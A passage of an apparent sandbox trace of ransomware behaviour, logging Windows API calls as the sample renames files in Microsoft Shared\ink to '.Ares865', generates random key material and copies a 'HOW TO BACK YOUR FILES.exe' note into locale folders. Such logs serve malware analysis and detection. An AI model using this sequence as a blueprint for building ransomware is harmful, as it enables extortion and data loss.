Shared\\ink\\ipsnld.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0076.699] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2626) returned 1 [0076.699] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0270) returned 1 [0076.700] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.700] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0076.702] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0270) returned 1 [0076.703] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.703] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0076.703] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml.Ares865") returned 69 [0076.703] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnor.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnor.xml.ares865"), dwFlags=0x1) returned 1 [0076.704] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnor.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0076.704] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2580) returned 1 [0076.705] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0270) returned 1 [0076.705] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.705] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0076.708] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0270) returned 1 [0076.709] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.709] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0076.709] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml.Ares865") returned 69 [0076.709] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplk.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplk.xml.ares865"), dwFlags=0x1) returned 1 [0076.711] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplk.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0076.712] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2600) returned 1 [0076.712] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0270) returned 1 [0076.713] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.713] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0076.715] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0270) returned 1 [0076.717] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.717] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0076.717] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml.Ares865") returned 69 [0076.717] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptb.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptb.xml.ares865"), dwFlags=0x1) returned 1 [0076.718] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptb.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0076.718] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2246) returned 1 [0076.719] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0270) returned 1 [0076.719] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.719] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0076.722] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0270) returned 1 [0076.722] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.722] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0076.723] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml.Ares865") returned 69 [0076.723] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptg.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptg.xml.ares865"), dwFlags=0x1) returned 1 [0076.724] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptg.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0076.724] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2240) returned 1 [0076.725] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0270) returned 1 [0076.725] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.725] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0076.728] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0270) returned 1 [0076.729] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.729] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0076.729] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml.Ares865") returned 69 [0076.729] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrom.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrom.xml.ares865"), dwFlags=0x1) returned 1 [0076.730] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrom.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0076.730] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2644) returned 1 [0076.731] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0270) returned 1 [0076.731] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.731] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0076.740] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0270) returned 1 [0076.741] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.741] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0076.741] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml.Ares865") returned 69 [0076.741] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrus.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrus.xml.ares865"), dwFlags=0x1) returned 1 [0076.743] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrus.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0076.743] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2542) returned 1 [0076.744] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0270) returned 1 [0076.744] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.744] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0076.747] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0270) returned 1 [0076.747] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.747] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0076.748] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml.Ares865") returned 69 [0076.748] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrb.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrb.xml.ares865"), dwFlags=0x1) returned 1 [0076.749] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrb.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0076.749] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2568) returned 1 [0076.749] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0270) returned 1 [0076.750] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.750] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0076.753] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0270) returned 1 [0076.753] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.753] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0076.754] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml.Ares865") returned 69 [0076.754] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrl.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrl.xml.ares865"), dwFlags=0x1) returned 1 [0076.755] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrl.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0076.755] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2596) returned 1 [0076.755] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0270) returned 1 [0076.756] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.756] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0076.758] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0270) returned 1 [0076.759] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.759] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0076.759] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml.Ares865") returned 69 [0076.760] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssve.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssve.xml.ares865"), dwFlags=0x1) returned 1 [0076.760] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssve.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0076.761] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2520) returned 1 [0076.761] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0270) returned 1 [0076.762] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.762] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0076.764] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0270) returned 1 [0076.765] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.765] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0076.766] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW" [0076.766] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c2608 | out: hHeap=0x2b0000) returned 1 [0076.766] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d27a0 | out: hHeap=0x2b0000) returned 1 [0076.766] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW") returned 56 [0076.766] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW" [0076.766] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0076.766] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-tw\\how to back your files.exe"), bFailIfExists=1) returned 1 [0076.770] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0076.770] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5f4381a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5f4381a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0076.770] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0076.770] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0076.770] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN" [0076.770] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c2588 | out: hHeap=0x2b0000) returned 1 [0076.770] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2780 | out: hHeap=0x2b0000) returned 1 [0076.770] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN") returned 56 [0076.771] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN" [0076.771] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0076.771] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-cn\\how to back your files.exe"), bFailIfExists=1) returned 1 [0076.775] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0076.775] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5f4381a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5f4381a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0076.775] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0076.775] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0076.775] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA" [0076.775] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c2508 | out: hHeap=0x2b0000) returned 1 [0076.775] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2760 | out: hHeap=0x2b0000) returned 1 [0076.775] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA") returned 56 [0076.775] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA" [0076.775] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0076.775] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\uk-ua\\how to back your files.exe"), bFailIfExists=1) returned 1 [0076.780] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0076.780] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5f4381a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5f4381a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0076.781] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0076.781] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0076.781] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR" [0076.781] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c2488 | out: hHeap=0x2b0000) returned 1 [0076.781] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2740 | out: hHeap=0x2b0000) returned 1 [0076.781] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR") returned 56 [0076.781] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR" [0076.781] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0076.781] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tr-tr\\how to back your files.exe"), bFailIfExists=1) returned 1 [0076.785] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0076.785] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5f45e300, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5f45e300, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0076.785] 